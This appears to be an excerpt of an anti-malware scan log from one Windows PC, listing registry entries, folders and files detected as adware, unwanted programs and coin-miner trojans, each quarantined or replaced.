Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\BIGTIME, Quarantined, [2805], [411132],1.0.9182
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch, Quarantined, [797], [259989],1.0.9182
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\DMUNVERSION, Quarantined, [446], [518477],1.0.9182
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Polygen_RASAPI32, Quarantined, [779], [568552],1.0.9182
Adware.Tuto4PC, HKLM\SOFTWARE\Foldershare, Quarantined, [2805], [536223],1.0.9182
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Polygen_RASMANCS, Quarantined, [779], [568552],1.0.9182
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Polygen.exe, Quarantined, [779], [568551],1.0.9182
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\bestavicampaign563, Quarantined, [446], [584322],1.0.9182
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\campaign9961, Quarantined, [446], [518478],1.0.9182
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\multitimercampaign84170, Quarantined, [446], [518476],1.0.9182
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\Speedycar, Quarantined, [446], [518473],1.0.9182
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\TechnologyDesktopnew, Quarantined, [446], [518479],1.0.9182
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\iewiouoxxf, Quarantined, [6000], [571190],1.0.9182
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{38519D9A-952D-4D91-9C1A-8C4F1933B519}, Quarantined, [6000], [571190],1.0.9182
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{38519D9A-952D-4D91-9C1A-8C4F1933B519}, Quarantined, [6000], [571190],1.0.9182
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{793C8F45-2D37-6E42-38A1-4FC6F516C21B}, Quarantined, [6000], [598042],1.0.9182
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A2AB8BC7-BF40-4EB1-BCF0-454B8BFC22A2}, Quarantined, [6000], [598042],1.0.9182
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{A2AB8BC7-BF40-4EB1-BCF0-454B8BFC22A2}, Quarantined, [6000], [598042],1.0.9182
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\hjuzju, Quarantined, [6000], [622124],1.0.9182
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{CE636CD2-BC9F-45B0-86B6-6533DEC76BA4}, Quarantined, [6000], [622124],1.0.9182
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{CE636CD2-BC9F-45B0-86B6-6533DEC76BA4}, Quarantined, [6000], [622124],1.0.9182
PUP.Optional.Wajam, HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9, Quarantined, [202], [170024],1.0.9182
PUP.Optional.Wajam, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9, Quarantined, [202], [170024],1.0.9182
PUP.Optional.Wajam, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9, Quarantined, [202], [170024],1.0.9182
Registry Value: 36
RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CloudNet, Quarantined, [732], [512160],1.0.9182
Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\EWMON|PARTNER, Quarantined, [2805], [411133],1.0.9182
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Quarantined, [797], [-1],0.0.0
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Quarantined, [797], [-1],0.0.0
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\ENVIRONMENT|SNF, Quarantined, [797], [-1],0.0.0
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|URL, Quarantined, [797], [259987],1.0.9182
Adware.Wajam, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
Adware.Wajam, HKU\S-1-5-19\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
Adware.Wajam, HKU\S-1-5-20\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
Adware.Wajam, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
Adware.Wajam, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|DEFAULT, Quarantined, [797], [259988],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8222286, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WK27HXJEIFMX6EE, Quarantined, [3707], [392931],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8735117, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|T9KTUNJFV82076N, Quarantined, [3707], [392931],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|9428290, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|U943W0QT19CB97H, Quarantined, [3707], [392931],1.0.9182
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\ENVIRONMENT|SNF, Quarantined, [797], [259517],1.0.9182
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\ENVIRONMENT|SNP, Quarantined, [797], [259518],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|3525589, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|URD8WCW2ZCRHWKK, Quarantined, [3707], [392931],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|NNHJYS7S607ZBCR, Quarantined, [3707], [392931],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|9236653, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8581968, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|44K3AH7DLU628F4, Quarantined, [3707], [392931],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|5608956, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|1293914, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\BIGTIME|PARTNER, Quarantined, [2805], [411132],1.0.9182
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|URL, Quarantined, [797], [259989],1.0.9182
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|DISPLAYNAME, Quarantined, [252], [259314],1.0.9182
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\DMUNVERSION|VERSION, Quarantined, [446], [518477],1.0.9182
PUP.Optional.Linkury, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|DISPLAYNAME, Quarantined, [252], [259313],1.0.9182
Trojan.BitCoinMiner.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CHROME, Quarantined, [3755], [525944],1.0.9182
PUP.Optional.CloudNet, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\FIREWALLRULES|{11A88E17-3A04-4D89-B347-E025C0716D1A}, Quarantined, [6124], [446028],1.0.9182
PUP.Optional.BazzSearch, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|nmeinlfojlcegblpogpjbhipmonclejh, Quarantined, [225], [550044],1.0.9182
Registry Data: 7
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH PAGE, Replaced, [797], [293485],1.0.9182
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Replaced, [797], [293485],1.0.9182
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH BAR, Replaced, [797], [293485],1.0.9182
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCHASSISTANT, Replaced, [797], [293485],1.0.9182
PUP.Optional.Linkury, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Replaced, [252], [293476],1.0.9182
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Replaced, [252], [293477],1.0.9182
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|DEFAULT_SEARCH_URL, Replaced, [797], [293486],1.0.9182
Data Stream: 0
(No malicious items detected)
Folder: 36
PUP.Optional.CloudNet, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CSRSS, Quarantined, [6124], [448845],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\1ZEXA4TQAG, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\5OOXISXWZZ, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7KTDBVJ05S, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7SOU0UO9PV, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\B7SDX8A68H, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CXCLBJAGPJ, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\FVCE9F427V, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\HXDOI2P3DW, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\RJE5VFPVEL, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\TPP28A3HUL, Quarantined, [2805], [487473],1.0.9182
RiskWare.BitCoinMiner, C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, C:\USERS\THOMAZING!\APPDATA\ROAMING\EpicNet Inc, Quarantined, [732], [512160],1.0.9182
Adware.Tuto4PC, C:\PROGRAM FILES (X86)\FOLDERSHARE, Quarantined, [2805], [474043],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\de, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\en, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\es, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\fr, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\ru, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7zS096D0AA2, Quarantined, [6100], [635578],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm39E0.tmp, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4579.tmp, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm49E9.tmp, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4D74.tmp, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm54A7.tmp, Quarantined, [494], [511084],1.0.9182
Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\ElectronCash, Quarantined, [602], [628365],1.0.9182
Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\ElectrumLTC, Quarantined, [602], [628365],1.0.9182
Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\MultiDoge, Quarantined, [602], [628365],1.0.9182
Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\Electrum, Quarantined, [602], [628365],1.0.9182
Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\Ethereum, Quarantined, [602], [628365],1.0.9182
Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\Exodus, Quarantined, [602], [628365],1.0.9182
Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\JAXX, Quarantined, [602], [628365],1.0.9182
Trojan.BitCoinMiner, C:\PROGRAMDATA\VMR6PC5JA6GYC9V0XH3B\FILES\Wallets, Quarantined, [602], [628365],1.0.9182
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\OTIZAMD5IS, Quarantined, [3707], [404709],1.0.9182
Adware.Tuto4PC.Generic, C:\PROGRAM FILES (X86)\0QFOY55ME3I, Quarantined, [3707], [404875],1.0.9182
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\XUL9ZBX11Q, Quarantined, [3707], [404610],1.0.9182
File: 140
Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\Joybam.tst, Quarantined, [3745], [404871],1.0.9182
Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\Silsoning.tst, Quarantined, [3745], [404871],1.0.9182
Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\NOAH.DAT, Quarantined, [3745], [404865],1.0.9182
Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\MD.XML, Quarantined, [3745], [404866],1.0.9182
Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\AGENT.DAT, Quarantined, [3745], [404872],1.0.9182
Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\UNINSTALL_TEMP.ICO, Quarantined, [3745], [404862],1.0.9182
PUP.Optional.CloudNet, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CSRSS\CLOUDNET.EXE, Quarantined, [6124], [448845],1.0.9182
PUP.Optional.CloudNet, C:\Users\Thomazing!\AppData\Local\Temp\csrss\scheduled.exe, Quarantined, [6124], [448845],1.0.9182
PUP.Optional.CloudNet, C:\Users\Thomazing!\AppData\Local\Temp\csrss\updateprofile-0128.exe, Quarantined, [6124], [448845],1.0.9182
PUP.Optional.CloudNet, C:\WINDOWS\SYSTEM32\TASKS\ScheduledUpdate, Quarantined, [6124], [448845],1.0.9182
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, Quarantined, [416], [455564],1.0.9182
Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, Quarantined, [416], [430694],1.0.9182
Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\MAIN.DAT, Quarantined, [3745], [442900],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\1ZEXA4TQAG\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\1ZEXA4TQAG\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\1ZEXA4TQAG\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\1ZEXA4TQAG\up.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\5OOXISXWZZ\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\5OOXISXWZZ\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\5OOXISXWZZ\up.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7KTDBVJ05S\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7KTDBVJ05S\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7KTDBVJ05S\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7SOU0UO9PV\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7SOU0UO9PV\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7SOU0UO9PV\up.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\B7SDX8A68H\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\B7SDX8A68H\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\B7SDX8A68H\up.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CXCLBJAGPJ\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\CXCLBJAGPJ\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\CXCLBJAGPJ\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\FVCE9F427V\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\FVCE9F427V\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\FVCE9F427V\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\FVCE9F427V\up.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\HXDOI2P3DW\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\HXDOI2P3DW\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\HXDOI2P3DW\up.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\RJE5VFPVEL\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\RJE5VFPVEL\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\RJE5VFPVEL\up.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\TPP28A3HUL\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\TPP28A3HUL\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\TPP28A3HUL\up.exe.config, Quarantined, [2805], [487473],1.0.9182
Adware.Linkury.Generic, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\SHAM.DB, Quarantined, [3745], [516189],1.0.9182
RiskWare.BitCoinMiner, C:\WINDOWS\SYSTEM32\TASKS\{44244107-8600-4170-9FE9-B04F411A8CD2}, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, C:\USERS\THOMAZING!\APPDATA\ROAMING\EpicNet Inc\CLOUDNET\cloudnet.exe, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\tmp7FE1.tmp, Quarantined, [732], [512160],1.0.9182
Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\SHAM.DB, Quarantined, [3745], [516191],1.0.9182
Adware.Tuto4PC, C:\PROGRAM FILES (X86)\FOLDERSHARE\FOLDERSHARE.EXE.CONFIG, Quarantined, [2805], [474043],1.0.9182
Adware.Tuto4PC, C:\Program Files (x86)\foldershare\foldershare.exe, Quarantined, [2805], [474043],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7zS096D0AA2\BundleConfig.xml, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\de\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\en\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\es\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\fr\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\ru\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\2019.02.08_21.55.21.861811_installer_pid=8312.txt, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\Carrier.EXE, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\DevLib.dll, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\ExternalResource.XML, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\GenericSetup.exe, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\GenericSetup.exe.config, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\installer.exe, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\Microsoft.Win32.TaskScheduler.dll, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\uTorrent.dll, Quarantined, [6100], [635578],1.0.9182
PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\WizardPages.dll, Quarantined, [6100], [635578],1.0.9182
